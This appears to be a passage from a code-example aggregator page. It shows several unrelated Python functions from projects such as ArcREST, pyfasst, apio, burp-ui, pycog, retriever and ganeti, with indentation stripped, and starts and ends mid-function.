if portal.featureServers is not None:
for hostingServer in portal.featureServers:
if hostingServer is not None:
if isinstance(hostingServer, AGSAdministration):
try:
serData = hostingServer.data
dataItems = serData.rootDataItems
if dataItems is not None:
if 'rootItems' in dataItems:
for rootItem in dataItems['rootItems']:
if rootItem == '/enterpriseDatabases':
rootItems = serData.findDataItems(ancestorPath=rootItem,type='fgdb,egdb')
if not rootItems is None and 'items' in rootItems:
for item in rootItems['items']:
if 'info' in item:
if 'isManaged' in item['info'] and item['info']['isManaged'] == True:
conStrDic = {}
conStr = item['info']['connectionString'].split(";")
for conStrValue in conStr:
spltval = conStrValue.split("=")
conStrDic[spltval[0]] = spltval[1]
if 'DBCLIENT' in conStrDic:
if str(conStrDic['DBCLIENT']).upper() == 'postgresql'.upper():
self._featureServiceFieldCase = 'lower'
except HTTPError as err:
if err.code == 403:
print ("Admistrative access denied, unable to check if hosting servers")
else:
print (err)
except Exception as e:
print (e)
except HTTPError as err:
if err.code == 403:
print ("Admistrative access denied, unable to check if hosting servers")
else:
print (err)
except Exception as e:
print (e)
if 'error' in self._securityHandler.message:
self._message = self._securityHandler.message
self._valid = False
else:
if self._securityHandler.message is not None:
self._message = self._securityHandler.message
self._valid = True
else:
self._message = 'Security info not set'
self._valid = True
except ValueError as e:
raise e
except Exception as e:
line, filename, synerror = trace()
raise common.ArcRestHelperError({
"function": "securityhandlerhelper_init",
"line": line,
"filename": filename,
"synerror": synerror,
})
0
Example 80
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_MinQT_chirped(minF0, maxF0, cqtfmax, cqtfmin, cqtbins=48.,
Fs=44100., Nfft=2048, stepNotes=4, \
lengthWindow=2048, Ot=0.5, perF0=1, \
depthChirpInSemiTone=0.5, loadWF0=True,
analysisWindow='hanning',
atomHopFactor=0.25,
cqtWinFunc=np.hanning, verbose=False):
"""\
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param cqtfmax: ...
:param Fs:
the desired sampling rate
:param Nfft:
the number of bins to compute the Fourier
transform
:param stepNotes:
the number of F0 per semitone
:param lengthWindow:
the size of the window for the Fourier
transform
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` -
the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` -
the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
20120828T2358 Horribly slow...
"""
# note: cqtfmax should actually be computed so as to guarantee
# the desired Nfft: - not necessary for minqt anymore
# cqtfmax = np.ceil(3. * Fs / (Nfft * (2**(1./cqtbins) - 1)))
# strange things happening to FFTLen...
if verbose>1: print "cqtfmax set to", cqtfmax
mqt = minqt.MinQTransfo(linFTLen=Nfft,
fmin=cqtfmin,
fmax=cqtfmax,
bins=cqtbins,
fs=Fs,
perfRast=1,
verbose=verbose,
winFunc=cqtWinFunc,
atomHopFactor=atomHopFactor)
# getting the right window length:
# in particular, it should not be less than the biggest window
# used by the minqt transform:
lengthWindow = np.maximum(lengthWindow,
mqt.cqtkernel.FFTLen *
(2**(mqt.octaveNr-1)))
# generating a filename to keep data:
filename = str('').join(['wf0minqt_',
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_cqtfmax-', str(cqtfmax),
'_cqtfmin-', str(cqtfmin),
'_cqtbins-', str(cqtbins),
'_Fs-', str(int(Fs)),
'_Nfft-', str(int(Nfft)),
'_atomHopFactor-%.2f' %(atomHopFactor),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_analysisWindow-', analysisWindow,
'_lengthWindow-%d' %(int(lengthWindow)),
'_cqtwinfunc-', cqtWinFunc.__name__,
'.npz'])
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['mqt'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(Fs)
stepNotes=np.double(stepNotes)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table=minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
if verbose>2:
print mqt.cqtkernel
print mqt.fmin, mqt.fmax, mqt.linFTLen, mqt.octaveNr, mqt.linBins
# computing the desired WF0 matrix
WF0 = np.zeros([mqt.freqbins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2. - mqt.time_stamps)**2)
if verbose>1: print midindex, mqt.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(mqt.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2.
- mqt.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(mqt.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, mqt=mqt)
return F0Table, WF0, mqt #, hybt, odgds
0
Example 81
Project: apio Source File: scons.py
def process_arguments(self, args):
# -- Check arguments
var_board = args['board']
var_fpga = args['fpga']
var_size = args['size']
var_type = args['type']
var_pack = args['pack']
# TODO: reduce code size
if var_board:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
if var_board in self.resources.boards:
fpga = self.resources.boards[var_board]['fpga']
if fpga in self.resources.fpgas:
fpga_size = self.resources.fpgas[fpga]['size']
fpga_type = self.resources.fpgas[fpga]['type']
fpga_pack = self.resources.fpgas[fpga]['pack']
redundant_arguments = []
contradictory_arguments = []
if var_fpga:
if var_fpga in self.resources.fpgas:
if var_fpga == fpga:
# Redundant argument
redundant_arguments += ['fpga']
else:
# Contradictory argument
contradictory_arguments += ['fpga']
else:
# Unknown fpga
click.secho(
'Error: unknown fpga: {0}'.format(
var_fpga), fg='red')
return 1
if var_size:
if var_size == fpga_size:
# Redundant argument
redundant_arguments += ['size']
else:
# Contradictory argument
contradictory_arguments += ['size']
if var_type:
if var_type == fpga_type:
# Redundant argument
redundant_arguments += ['type']
else:
# Contradictory argument
contradictory_arguments += ['type']
if var_pack:
if var_pack == fpga_pack:
# Redundant argument
redundant_arguments += ['pack']
else:
# Contradictory argument
contradictory_arguments += ['pack']
if redundant_arguments:
# Redundant argument
click.secho(
'Warning: redundant arguments: {}'.format(
', '.join(redundant_arguments)), fg='yellow')
if contradictory_arguments:
# Contradictory argument
click.secho(
'Error: contradictory arguments: {}'.format(
', '.join(contradictory_arguments)), fg='red')
return 1
else:
# Unknown fpga
pass
else:
# Unknown board
click.secho(
'Error: unknown board: {0}'.format(var_board), fg='red')
return 1
else:
if var_fpga:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
if var_fpga in self.resources.fpgas:
fpga_size = self.resources.fpgas[var_fpga]['size']
fpga_type = self.resources.fpgas[var_fpga]['type']
fpga_pack = self.resources.fpgas[var_fpga]['pack']
redundant_arguments = []
contradictory_arguments = []
if var_size:
if var_size == fpga_size:
# Redundant argument
redundant_arguments += ['size']
else:
# Contradictory argument
contradictory_arguments += ['size']
if var_type:
if var_type == fpga_type:
# Redundant argument
redundant_arguments += ['type']
else:
# Contradictory argument
contradictory_arguments += ['type']
if var_pack:
if var_pack == fpga_pack:
# Redundant argument
redundant_arguments += ['pack']
else:
# Contradictory argument
contradictory_arguments += ['pack']
if redundant_arguments:
# Redundant argument
click.secho(
'Warning: redundant arguments: {}'.format(
', '.join(redundant_arguments)), fg='yellow')
if contradictory_arguments:
# Contradictory argument
click.secho(
'Error: contradictory arguments: {}'.format(
', '.join(contradictory_arguments)), fg='red')
return 1
else:
# Unknown fpga
click.secho(
'Error: unknown fpga: {0}'.format(var_fpga), fg='red')
return 1
else:
if var_size and var_type and var_pack:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
fpga_size = var_size
fpga_type = var_type
fpga_pack = var_pack
else:
if not var_size and not var_type and not var_pack:
# No arguments: use apio.ini board
p = Project()
p.read()
if p.board:
var_board = p.board
click.secho(
'Info: use apio.ini board: {}'.format(
var_board))
fpga = self.resources.boards[var_board]['fpga']
fpga_size = self.resources.fpgas[fpga]['size']
fpga_type = self.resources.fpgas[fpga]['type']
fpga_pack = self.resources.fpgas[fpga]['pack']
else:
click.secho(
'Error: insufficient arguments: missing board',
fg='red')
click.secho(
'You have two options:\n' +
' 1) Execute your command with\n' +
' `--board <boardname>`\n' +
' 2) Create an ini file using\n' +
' `apio init --board <boardname>`',
fg='yellow')
return 1
else:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board',
fg='yellow')
# Insufficient arguments
missing = []
if not var_size:
missing += ['size']
if not var_type:
missing += ['type']
if not var_pack:
missing += ['pack']
pass
click.secho(
'Error: insufficient arguments: missing {}'.format(
', '.join(missing)), fg='red')
return 1
# -- Build Scons variables list
variables = self.format_vars({
'fpga_size': fpga_size,
'fpga_type': fpga_type,
'fpga_pack': fpga_pack
})
return variables, var_board
0
Example 82
def __init__(self, server=None, conf=None, dummy=False):
"""The :class:`burpui.misc.backend.burp1.Burp` class provides a consistent
backend for ``burp-1`` servers.
It implements the :class:`burpui.misc.backend.interface.BUIbackend` class
in order to have consistent data whatever backend is used.
:param server: ``Burp-UI`` server instance in order to access logger
and/or some global settings
:type server: :class:`burpui.server.BUIServer`
:param conf: Configuration to use
:type conf: :class:`burpui.config.BUIConfig`
:param dummy: Does not instanciate the object (used for development
purpose)
:type dummy: boolean
"""
if dummy:
return
self.client_version = None
self.server_version = None
self.app = None
self.zip64 = G_ZIP64
self.host = G_BURPHOST
self.port = G_BURPPORT
self.burpbin = G_BURPBIN
self.stripbin = G_STRIPBIN
self.burpconfcli = G_BURPCONFCLI
self.burpconfsrv = G_BURPCONFSRV
self.includes = G_INCLUDES
self.revoke = G_REVOKE
self.enforce = G_ENFORCE
self.running = []
self.defaults = {
'Burp1': {
'bport': G_BURPPORT,
'bhost': G_BURPHOST,
'burpbin': G_BURPBIN,
'stripbin': G_STRIPBIN,
'bconfcli': G_BURPCONFCLI,
'bconfsrv': G_BURPCONFSRV,
'tmpdir': G_TMPDIR,
},
'Experimental': {
'zip64': G_ZIP64,
},
'Security': {
'includes': G_INCLUDES,
'revoke': G_REVOKE,
'enforce': G_ENFORCE,
},
}
tmpdir = G_TMPDIR
if conf is not None:
conf.update_defaults(self.defaults)
conf.default_section('Burp1')
self.port = conf.safe_get('bport', 'integer')
self.host = conf.safe_get('bhost')
self.burpbin = self._get_binary_path(
conf,
'burpbin',
G_BURPBIN
)
self.stripbin = self._get_binary_path(
conf,
'stripbin',
G_STRIPBIN
)
confcli = conf.safe_get('bconfcli')
confsrv = conf.safe_get('bconfsrv')
tmpdir = conf.safe_get('tmpdir')
# Experimental options
self.zip64 = conf.safe_get(
'zip64',
'boolean',
section='Experimental'
)
# Security options
self.includes = conf.safe_get(
'includes',
'force_list',
section='Security'
)
self.enforce = conf.safe_get(
'enforce',
'boolean',
section='Security'
)
self.revoke = conf.safe_get(
'revoke',
'boolean',
section='Security'
)
if confcli and not os.path.isfile(confcli):
self.logger.warning("The file '%s' does not exist", confcli)
confcli = None
if confsrv and not os.path.isfile(confsrv):
self.logger.warning("The file '%s' does not exist", confsrv)
confsrv = None
if self.host not in ['127.0.0.1', '::1']:
self.logger.warning("Invalid value for 'bhost'. Must be '127.0.0.1' or '::1'. Falling back to '%s'", G_BURPHOST)
self.host = G_BURPHOST
self.burpconfcli = confcli
self.burpconfsrv = confsrv
if tmpdir and os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
self.logger.warning("'%s' is not a directory", tmpdir)
if tmpdir == G_TMPDIR:
raise IOError("Cannot use '{}' as tmpdir".format(tmpdir))
tmpdir = G_TMPDIR
if os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
raise IOError("Cannot use '{}' as tmpdir".format(tmpdir))
if tmpdir and not os.path.exists(tmpdir):
os.makedirs(tmpdir)
self.tmpdir = tmpdir
self.parser = Parser(self)
self.family = Burp._get_inet_family(self.host)
self._test_burp_server_address(self.host)
try:
cmd = [self.burpbin, '-v']
self.client_version = subprocess.check_output(cmd, universal_newlines=True).rstrip().replace('burp-', '')
except:
pass
try:
cmd = [self.burpbin, '-a', 'l']
if self.burpconfcli:
cmd += ['-c', self.burpconfcli]
for line in subprocess.check_output(cmd, universal_newlines=True).split('\n'):
result = re.search(r'^.*Server version:\s+(\d+\.\d+\.\d+)', line)
if result:
self.server_version = result.group(1)
break
except:
pass
self.logger.info('burp port: {}'.format(self.port))
self.logger.info('burp host: {}'.format(self.host))
self.logger.info('burp binary: {}'.format(self.burpbin))
self.logger.info('strip binary: {}'.format(self.stripbin))
self.logger.info('burp conf cli: {}'.format(self.burpconfcli))
self.logger.info('burp conf srv: {}'.format(self.burpconfsrv))
self.logger.info('tmpdir: {}'.format(self.tmpdir))
self.logger.info('zip64: {}'.format(self.zip64))
self.logger.info('includes: {}'.format(self.includes))
self.logger.info('enforce: {}'.format(self.enforce))
self.logger.info('revoke: {}'.format(self.revoke))
try:
# make the connection
self.status()
except BUIserverException:
pass
0
Example 83
Project: pycog Source File: sgd.py
def train(self, gradient_data, validation_data, savefile):
"""
Train the RNN.
Paramters
---------
gradient_data : pycog.Dataset
Gradient dataset.
validation_data : pycog.Dataset
Validation dataset.
savefile : str
File to save network information in.
"""
checkfreq = self.p['checkfreq']
if checkfreq is None:
checkfreq = int(1e4)//gradient_data.minibatch_size
patience = self.p['patience']
if patience is None:
patience = 100*checkfreq
alpha = self.p['dt']/self.p['tau']
lambda_Omega = self.p['lambda_Omega']
lr = self.p['learning_rate']
maxnorm = self.p['max_gradient_norm']
bound = self.p['bound']
save_exclude = ['callback', 'performance', 'terminate']
#---------------------------------------------------------------------------------
# Continue previous run if we can
#---------------------------------------------------------------------------------
if os.path.isfile(savefile):
with open(savefile) as f:
save = pickle.load(f)
best = save['best']
init_p = save['current']
first_iter = save['iter']
costs_history = save['costs_history']
Omega_history = save['Omega_history']
# Restore RNGs for datasets
gradient_data.rng = save['rng_gradient']
validation_data.rng = save['rng_validation']
# Restore parameter values
for i, j in zip(self.trainables, init_p):
i.set_value(j)
print(("[ {}.SGD.train ] Recovered saved model,"
" continuing from iteration {}.").format(THIS, first_iter))
else:
best = {
'iter': 1,
'cost': np.inf,
'other_costs': [],
'params': SGD.get_values(self.save_values)
}
first_iter = best['iter']
costs_history = []
Omega_history = []
# Save initial conditions
save = {
'params': {k: v for k, v in self.p.items()
if k not in save_exclude},
'varlist': self.trainable_names,
'iter': 1,
'current': SGD.get_values(self.trainables),
'best': best,
'costs_history': costs_history,
'Omega_history': Omega_history,
'rng_gradient': gradient_data.rng,
'rng_validation': validation_data.rng
}
base, ext = os.path.splitext(savefile)
dump(base + '_init' + ext, save)
#---------------------------------------------------------------------------------
# Updates
#---------------------------------------------------------------------------------
performance = self.p['performance']
terminate = self.p['terminate']
tr_Omega = None
tr_gnorm = None
try:
tstart = datetime.datetime.now()
for iter in xrange(first_iter, 1+self.p['max_iter']):
if iter % checkfreq == 1:
#---------------------------------------------------------------------
# Timestamp
#---------------------------------------------------------------------
tnow = datetime.datetime.now()
totalsecs = (tnow - tstart).total_seconds()
hrs = int(totalsecs//3600)
mins = int(totalsecs%3600)//60
secs = int(totalsecs%60)
timestamp = tnow.strftime('%b %d %Y %I:%M:%S %p').replace(' 0', ' ')
print('{} updates - {} ({} hrs {} mins {} secs elapsed)'
.format(iter-1, timestamp, hrs, mins, secs))
#---------------------------------------------------------------------
# Validate
#---------------------------------------------------------------------
# Validation cost
costs = self.f_cost(*validation_data(best['other_costs']))
z = costs[-1] # network outputs
costs = [float(i) for i in costs[:-1]]
s0 = "| validation loss / RMSE"
s1 = ": {:.6f} / {:.6f}".format(costs[0], costs[1])
# Dashes
nfill = 70
# Compute task-specific performance
if performance is not None:
costs.append(performance(validation_data.get_trials(),
SGD.get_value(z)))
s0 += " / performance"
s1 += " / {:.2f}".format(costs[-1])
s = s0 + s1
# Callback
if self.p['callback'] is not None:
callback_results = self.p['callback'](
validation_data.get_trials(), SGD.get_value(z)
)
else:
callback_results = None
# Keep track of costs
costs_history.append((gradient_data.ntrials, costs))
# Record the value of the regularization term in the last iteration
if tr_Omega is not None:
Omega_history.append(
(gradient_data.ntrials, lambda_Omega*tr_Omega)
)
# New best
if costs[0] < best['cost']:
s += ' ' + '-'*(nfill - len(s))
s += " NEW BEST (prev. best: {:.6f})".format(best['cost'])
best = {
'iter': iter,
'cost': costs[0],
'other_costs': costs[1:],
'params': SGD.get_values(self.save_values)
}
print(s)
# Spectral radius
rho = RNN.spectral_radius(self.Wrec_.eval())
# Format
Omega = ('n/a' if tr_Omega is None
else '{:.8f}'.format(float(tr_Omega)))
gnorm = ('n/a' if tr_gnorm is None
else '{:.8f}'.format(float(tr_gnorm)))
# Info
print("| Omega (last iter) = {}".format(Omega))
print("| grad. norm (last iter) = {}".format(gnorm))
print("| rho = {:.8f}".format(rho))
sys.stdout.flush()
#---------------------------------------------------------------------
# Save progress
#---------------------------------------------------------------------
save = {
'params': {k: v for k, v in self.p.items()
if k not in save_exclude},
'varlist': self.trainable_names,
'iter': iter,
'current': SGD.get_values(self.trainables),
'best': best,
'costs_history': costs_history,
'Omega_history': Omega_history,
'rng_gradient': gradient_data.rng,
'rng_validation': validation_data.rng
}
dump(savefile, save)
if costs[1] <= self.p['min_error']:
print("Reached minimum error of {:.6f}"
.format(self.p['min_error']))
break
# This termination criterion assumes that performance is not None
if terminate(np.array([c[-1] for _, c in costs_history])):
print("Termination criterion satisfied -- we\'ll call it a day.")
break
if iter - best['iter'] > patience:
print("We've run out of patience -- time to give up.")
break
#-------------------------------------------------------------------------
# Training step
#-------------------------------------------------------------------------
tr_cost, tr_gnorm, tr_Omega, tr_nelems, tr_x = self.train_step(
*(gradient_data(best['other_costs'], callback_results)
+ [alpha, lambda_Omega, lr, maxnorm, bound])
)
#-------------------------------------------------------------------------
except KeyboardInterrupt:
print("[ {}.SGD.train ] Training interrupted by user during iteration {}."
.format(THIS, iter))
0
Example 84
Project: retriever Source File: bbs50stop.py
def download(self, engine=None, debug=False):
try:
Script.download(self, engine, debug)
engine = self.engine
# Species table
table = Table("species", cleanup=Cleanup(), contains_pk=True,
header_rows=9)
table.columns=[("species_id", ("pk-int",) ),
("AOU", ("int",) ),
("english_common_name", ("char",50) ),
("french_common_name", ("char",50) ),
("spanish_common_name", ("char",50) ),
("sporder", ("char",30) ),
("family", ("char",30) ),
("genus", ("char",30) ),
("species", ("char",50) ),
]
table.fixed_width = [7,6,51,51,51,51,51,51,50]
engine.table = table
engine.create_table()
engine.insert_data_from_url(self.urls["species"])
# Routes table
engine.download_files_from_archive(self.urls["routes"], ["routes.csv"])
engine.auto_create_table(Table("routes", cleanup=Cleanup()),
filename="routes.csv")
engine.insert_data_from_file(engine.format_filename("routes.csv"))
# Weather table
if not os.path.isfile(engine.format_filename("weather_new.csv")):
engine.download_files_from_archive(self.urls["weather"],
["weather.csv"])
read = open(engine.format_filename("weather.csv"), "rb")
write = open(engine.format_filename("weather_new.csv"), "wb")
print("Cleaning weather data...")
for line in read:
values = line.split(b',')
newvalues = []
for value in values:
if ':' in value:
newvalues.append(value.replace(':', ''))
elif value == "N":
newvalues.append(None)
else:
newvalues.append(value)
write.write(','.join(str(value) for value in newvalues))
write.close()
read.close()
engine.auto_create_table(Table("weather", pk="RouteDataId",
cleanup=Cleanup(correct_invalid_value, nulls=['NULL'])),
filename="weather_new.csv")
engine.insert_data_from_file(engine.format_filename("weather_new.csv"))
# Region_codes table
table = Table("region_codes", pk=False, header_rows=11,
fixed_width=[11, 11, 30])
def regioncodes_cleanup(value, engine):
replace = {chr(225):"a", chr(233):"e", chr(237):"i", chr(243):"o"}
newvalue = str(value)
for key in list(replace.keys()):
if key in newvalue:
newvalue = newvalue.replace(key, replace[key])
return newvalue
table.cleanup = Cleanup(regioncodes_cleanup)
table.columns=[("countrynum" , ("int",) ),
("regioncode" , ("int",) ),
("regionname" , ("char",30) )]
engine.table = table
engine.create_table()
engine.insert_data_from_url(self.urls["region_codes"])
# Counts table
table = Table("counts", pk=False, delimiter=',')
table.columns=[("RouteDataID" , ("int",) ),
("countrynum" , ("int",) ),
("statenum" , ("int",) ),
("Route" , ("int",) ),
("RPID" , ("int",) ),
("year" , ("int",) ),
("AOU" , ("int",) ),
("Stop1" , ("int",) ),
("Stop2" , ("int",) ),
("Stop3" , ("int",) ),
("Stop4" , ("int",) ),
("Stop5" , ("int",) ),
("Stop6" , ("int",) ),
("Stop7" , ("int",) ),
("Stop8" , ("int",) ),
("Stop9" , ("int",) ),
("Stop10" , ("int",) ),
("Stop11" , ("int",) ),
("Stop12" , ("int",) ),
("Stop13" , ("int",) ),
("Stop14" , ("int",) ),
("Stop15" , ("int",) ),
("Stop16" , ("int",) ),
("Stop17" , ("int",) ),
("Stop18" , ("int",) ),
("Stop19" , ("int",) ),
("Stop20" , ("int",) ),
("Stop21" , ("int",) ),
("Stop22" , ("int",) ),
("Stop23" , ("int",) ),
("Stop24" , ("int",) ),
("Stop25" , ("int",) ),
("Stop26" , ("int",) ),
("Stop27" , ("int",) ),
("Stop28" , ("int",) ),
("Stop29" , ("int",) ),
("Stop30" , ("int",) ),
("Stop31" , ("int",) ),
("Stop32" , ("int",) ),
("Stop33" , ("int",) ),
("Stop34" , ("int",) ),
("Stop35" , ("int",) ),
("Stop36" , ("int",) ),
("Stop37" , ("int",) ),
("Stop38" , ("int",) ),
("Stop39" , ("int",) ),
("Stop40" , ("int",) ),
("Stop41" , ("int",) ),
("Stop42" , ("int",) ),
("Stop43" , ("int",) ),
("Stop44" , ("int",) ),
("Stop45" , ("int",) ),
("Stop46" , ("int",) ),
("Stop47" , ("int",) ),
("Stop48" , ("int",) ),
("Stop49" , ("int",) ),
("Stop50" , ("int",) )]
part = ""
engine.table = table
engine.create_table()
for part in range(1,11):
part = str(part)
try:
print("Inserting data from part " + part + "...")
try:
engine.table.cleanup = Cleanup()
engine.insert_data_from_archive(self.urls["counts"] +
"Fifty" + part + ".zip",
["fifty" + part + ".csv"])
except:
print("Failed bulk insert on " + part + ", inserting manually.")
engine.connection.rollback()
engine.table.cleanup = Cleanup(correct_invalid_value,
nulls=['*'])
engine.insert_data_from_archive(self.urls["counts"] +
"Fifty" + part + ".zip",
["fifty" + part + ".csv"])
except:
print("There was an error in part " + part + ".")
raise
except zipfile.BadZipfile:
print("There was an unexpected error in the Breeding Bird Survey archives.")
raise
return engine
0
Example 85
Project: ganeti Source File: daemon.py
def GenericMain(daemon_name, optionparser,
check_fn, prepare_fn, exec_fn,
multithreaded=False, console_logging=False,
default_ssl_cert=None, default_ssl_key=None,
warn_breach=False):
"""Shared main function for daemons.
@type daemon_name: string
@param daemon_name: daemon name
@type optionparser: optparse.OptionParser
@param optionparser: initialized optionparser with daemon-specific options
(common -f -d options will be handled by this module)
@type check_fn: function which accepts (options, args)
@param check_fn: function that checks start conditions and exits if they're
not met
@type prepare_fn: function which accepts (options, args)
@param prepare_fn: function that is run before forking, or None;
it's result will be passed as the third parameter to exec_fn, or
if None was passed in, we will just pass None to exec_fn
@type exec_fn: function which accepts (options, args, prepare_results)
@param exec_fn: function that's executed with the daemon's pid file held, and
runs the daemon itself.
@type multithreaded: bool
@param multithreaded: Whether the daemon uses threads
@type console_logging: boolean
@param console_logging: if True, the daemon will fall back to the system
console if logging fails
@type default_ssl_cert: string
@param default_ssl_cert: Default SSL certificate path
@type default_ssl_key: string
@param default_ssl_key: Default SSL key path
@type warn_breach: bool
@param warn_breach: issue a warning at daemon launch time, before
daemonizing, about the possibility of breaking parameter privacy
invariants through the otherwise helpful debug logging.
"""
optionparser.add_option("-f", "--foreground", dest="fork",
help="Don't detach from the current terminal",
default=True, action="store_false")
optionparser.add_option("-d", "--debug", dest="debug",
help="Enable some debug messages",
default=False, action="store_true")
optionparser.add_option("--syslog", dest="syslog",
help="Enable logging to syslog (except debug"
" messages); one of 'no', 'yes' or 'only' [%s]" %
constants.SYSLOG_USAGE,
default=constants.SYSLOG_USAGE,
choices=["no", "yes", "only"])
family = ssconf.SimpleStore().GetPrimaryIPFamily()
# family will default to AF_INET if there is no ssconf file (e.g. when
# upgrading a cluster from 2.2 -> 2.3. This is intended, as Ganeti clusters
# <= 2.2 can not be AF_INET6
if daemon_name in constants.DAEMONS_PORTS:
default_bind_address = constants.IP4_ADDRESS_ANY
if family == netutils.IP6Address.family:
default_bind_address = constants.IP6_ADDRESS_ANY
default_port = netutils.GetDaemonPort(daemon_name)
# For networked daemons we allow choosing the port and bind address
optionparser.add_option("-p", "--port", dest="port",
help="Network port (default: %s)" % default_port,
default=default_port, type="int")
optionparser.add_option("-b", "--bind", dest="bind_address",
help=("Bind address (default: '%s')" %
default_bind_address),
default=default_bind_address, metavar="ADDRESS")
optionparser.add_option("-i", "--interface", dest="bind_interface",
help=("Bind interface"), metavar="INTERFACE")
if default_ssl_key is not None and default_ssl_cert is not None:
optionparser.add_option("--no-ssl", dest="ssl",
help="Do not secure HTTP protocol with SSL",
default=True, action="store_false")
optionparser.add_option("-K", "--ssl-key", dest="ssl_key",
help=("SSL key path (default: %s)" %
default_ssl_key),
default=default_ssl_key, type="string",
metavar="SSL_KEY_PATH")
optionparser.add_option("-C", "--ssl-cert", dest="ssl_cert",
help=("SSL certificate path (default: %s)" %
default_ssl_cert),
default=default_ssl_cert, type="string",
metavar="SSL_CERT_PATH")
# Disable the use of fork(2) if the daemon uses threads
if multithreaded:
utils.DisableFork()
options, args = optionparser.parse_args()
if getattr(options, "bind_interface", None) is not None:
if options.bind_address != default_bind_address:
msg = ("Can't specify both, bind address (%s) and bind interface (%s)" %
(options.bind_address, options.bind_interface))
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
interface_ip_addresses = \
netutils.GetInterfaceIpAddresses(options.bind_interface)
if family == netutils.IP6Address.family:
if_addresses = interface_ip_addresses[constants.IP6_VERSION]
else:
if_addresses = interface_ip_addresses[constants.IP4_VERSION]
if len(if_addresses) < 1:
msg = "Failed to find IP for interface %s" % options.bind_interace
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
options.bind_address = if_addresses[0]
if getattr(options, "ssl", False):
ssl_paths = {
"certificate": options.ssl_cert,
"key": options.ssl_key,
}
for name, path in ssl_paths.iteritems():
if not os.path.isfile(path):
print >> sys.stderr, "SSL %s file '%s' was not found" % (name, path)
sys.exit(constants.EXIT_FAILURE)
# TODO: By initiating http.HttpSslParams here we would only read the files
# once and have a proper validation (isfile returns False on directories)
# at the same time.
result, running_uid, expected_uid = _VerifyDaemonUser(daemon_name)
if not result:
msg = ("%s started using wrong user ID (%d), expected %d" %
(daemon_name, running_uid, expected_uid))
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
if check_fn is not None:
check_fn(options, args)
log_filename = constants.DAEMONS_LOGFILES[daemon_name]
# node-daemon logging in lib/http/server.py, _HandleServerRequestInner
if options.debug and warn_breach:
sys.stderr.write(constants.DEBUG_MODE_CONFIDENTIALITY_WARNING % daemon_name)
if options.fork:
# Newer GnuTLS versions (>= 3.3.0) use a library constructor for
# initialization and open /dev/urandom on library load time, way before we
# fork(). Closing /dev/urandom causes subsequent ganeti.http.client
# requests to fail and the process to receive a SIGABRT. As we cannot
# reliably detect GnuTLS's socket, we work our way around this by keeping
# all fds referring to /dev/urandom open.
noclose_fds = []
for fd in os.listdir("/proc/self/fd"):
try:
if os.readlink(os.path.join("/proc/self/fd", fd)) == "/dev/urandom":
noclose_fds.append(int(fd))
except EnvironmentError:
# The fd might have disappeared (although it shouldn't as we're running
# single-threaded).
continue
